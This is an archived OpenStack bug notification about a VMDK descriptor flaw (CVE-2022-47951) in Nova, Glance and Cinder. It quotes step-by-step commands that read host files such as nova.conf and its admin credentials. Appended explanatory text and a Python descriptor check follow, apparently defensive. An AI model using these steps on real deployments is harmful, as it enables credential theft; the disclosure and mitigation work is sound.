yahoo-eng-team team mailing list archive

[Bug 1996188] Re: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)


Reviewed:  https://review.opendev.org/c/openstack/ossa/+/871635
Committed: https://opendev.org/openstack/ossa/commit/07833d0dcd6f0745a7a487f55d5a23ff76d4c202
Submitter: "Zuul (22348)"
Branch:    master

commit 07833d0dcd6f0745a7a487f55d5a23ff76d4c202
Author: Jeremy Stanley <fungi@xxxxxxxxxxx>
Date:   Tue Jan 24 15:11:10 2023 +0000

    Add OSSA-2023-002 (CVE-2022-47951)
    
    Change-Id: If071ca13337d87f24bbbdec24cbecb826165f4f4
    Closes-Bug: #1996188


** Changed in: ossa
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  In Progress
Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our OpenStack team discovered what looks like a security issue in Nova this morning, allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here are the details:
  By using a VMDK file, you can dump any file on the hypervisor.
  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot, of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content, and from it you can get access to the OpenStack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it affects Nova, but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]

  cinder seems also affected

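The mechanism behind the report above is that a VMDK descriptor names the files holding the disk data, and qemu-img opens whatever file a FLAT extent names and reads it as the disk contents; because Nova, Glance and Cinder all run qemu-img over uploaded images, an extent line pointing at /etc/nova/nova.conf turns that file into the instance disk. The following is an added example, not code from the report or from any of the three projects' fixes: a descriptor pre-check that rejects the exact pattern shown in step 2 (an absolute extent path, a FLAT extent, and a multi-file createType) before qemu-img is ever pointed at the upload. The function names, the createType allow-list and the two sample descriptors are assumptions constructed for this example; the extent line syntax is the one the report shows.

```python
import re
from pathlib import PurePosixPath

# Extent lines in a VMDK text descriptor look like (syntax as shown in the report):
#   RW 2048 FLAT "leak-flat.vmdk" 0
#   RW 2048 SPARSE "leak.vmdk"
EXTENT_RE = re.compile(
    r'^(?P<access>RW|RDONLY|NOACCESS)\s+(?P<size>\d+)\s+'
    r'(?P<type>FLAT|SPARSE|ZERO|VMFS|VMFSSPARSE|VMFSRDM|VMFSRAW)'
    r'(?:\s+"(?P<file>[^"]*)"(?:\s+(?P<offset>\d+))?)?\s*$'
)

# Assumed operator policy (not from the advisory): only self-contained,
# single-file sub-formats are acceptable for an uploaded image.
ALLOWED_CREATE_TYPES = ("monolithicSparse", "streamOptimized")

# Constructed sample: what leak.vmdk looks like after step 2 of the report.
MALICIOUS_DESCRIPTOR = """\
# Disk DescriptorFile
version=1
CID=fffffffe
parentCID=ffffffff
createType="monolithicFlat"

# Extent description
RW 2048 FLAT "/etc/nova/nova.conf" 0

# The Disk Data Base
#DDB
ddb.virtualHWVersion = "4"
ddb.adapterType = "ide"
"""

# Constructed sample: a benign single-file sparse descriptor.
BENIGN_DESCRIPTOR = """\
# Disk DescriptorFile
version=1
CID=fffffffe
parentCID=ffffffff
createType="monolithicSparse"

# Extent description
RW 2048 SPARSE "leak.vmdk"
"""


def parse_descriptor(text):
    """Return (createType, [extent dicts]) from a VMDK text descriptor."""
    create_type = None
    extents = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = EXTENT_RE.match(line)
        if m:
            extents.append(m.groupdict())
            continue
        key, sep, value = line.partition("=")
        if sep and key.strip() == "createType":
            create_type = value.strip().strip('"')
    return create_type, extents


def descriptor_problems(text, allowed=ALLOWED_CREATE_TYPES):
    """List the reasons an uploaded descriptor should be rejected before
    qemu-img is ever pointed at it. An empty list means it passed."""
    problems = []
    create_type, extents = parse_descriptor(text)
    if create_type not in allowed:
        problems.append(f"createType {create_type!r} is not in the allow-list")
    for ext in extents:
        fname = ext["file"]
        if fname is None:  # ZERO extents carry no file name
            continue
        path = PurePosixPath(fname)
        # Absolute POSIX path, UNC-style path, or a Windows drive letter.
        if path.is_absolute() or fname.startswith("\\") or re.match(r"^[A-Za-z]:", fname):
            problems.append(f"extent {fname!r} is an absolute path")
        # ".." or any directory component means the extent is not a sibling of
        # the descriptor; a single uploaded file cannot legitimately reference one.
        elif ".." in path.parts or len(path.parts) != 1:
            problems.append(f"extent {fname!r} leaves the image directory")
        if ext["type"] == "FLAT":
            problems.append(
                f"extent {fname!r} is FLAT: qemu-img would read the named "
                "host file verbatim as the disk contents")
    return problems


if __name__ == "__main__":
    for name, text in (("malicious", MALICIOUS_DESCRIPTOR), ("benign", BENIGN_DESCRIPTOR)):
        print(name, descriptor_problems(text) or "OK")
```

Two caveats when applying this check in practice. First, it works on a plain-text descriptor; for monolithicSparse and streamOptimized files the descriptor is embedded inside the binary image, so it has to be extracted before the same checks can be run. Second, the check only helps if the service never lets qemu-img guess the format from the file contents: a file that was uploaded as "raw" or "qcow2" but is really a VMDK descriptor would bypass any VMDK-specific inspection, so the format passed to qemu-img must be pinned to what the image metadata claims and rejected when the two disagree.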